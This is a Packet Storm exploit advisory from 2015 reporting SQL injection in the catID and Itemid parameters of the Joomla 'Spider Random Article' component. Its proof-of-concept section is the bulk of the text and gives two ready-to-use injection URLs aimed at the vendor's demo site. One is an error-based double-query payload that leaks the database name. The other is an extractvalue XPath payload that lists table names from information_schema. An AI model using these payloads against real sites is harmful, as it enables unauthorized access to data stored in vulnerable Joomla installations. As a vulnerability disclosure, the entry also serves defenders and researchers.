Joomla Spider Random Article SQL Injection

2015-03-25T00:00:00
ID PACKETSTORM:131016
Type packetstorm
Reporter Jagriti Sahu
Modified 2015-03-25T00:00:00

Description

                                        
                                            `##################################################################################################  
#Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability  
#Author : Jagriti Sahu AKA Incredible  
#Vendor Link : http://demo.web-dorado.com/spider-random-article.html  
#Date : 22/03/2015  
#Discovered at : IndiShell Lab  
#Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^  
##################################################################################################  
  
////////////////////////  
/// Overview:  
////////////////////////  
  
  
joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters  
and hence affected by SQL injection vulnerability   
  
///////////////////////////////  
// Vulnerability Description:  
///////////////////////////////  
vulnerability is due to catID and Itemid parameter   
  
  
////////////////  
/// POC ////  
///////////////  
  
  
SQL Injection in catID parameter  
=================================  
  
Use error based double query injection with catID parameter  
  
Injected Link--->  
  
http://demo.web-dorado.com  
  
Like error based double query injection for exploiting username --->  
http://demo.web-dorado.com/index.php?option=com_rand&catID=1' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13   
  
POC Image URL--->  
http://tinypic.com/view.php?pic=iz9aiu&s=8#.VRG9duESHIU  
  
  
  
  
SQL Injection in Itemid parameter  
=================================  
  
Itemid Parameter is exploitable using xpath injection  
  
http://demo.web-dorado.com/index.php?option=com_rand&catID=1&limit=1&style=1&view=articles&format=raw&Itemid=13'and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -  
  
POC Image URL--->  
http://tinypic.com/view.php?pic=1239z5h&s=8#.VRG97OESHIU  
  
  
###################################################################################################  
  
  
--==[[Special Thanks to]]==--  
  
# Manish Kishan Tanwar ^_^ #  
  
  
`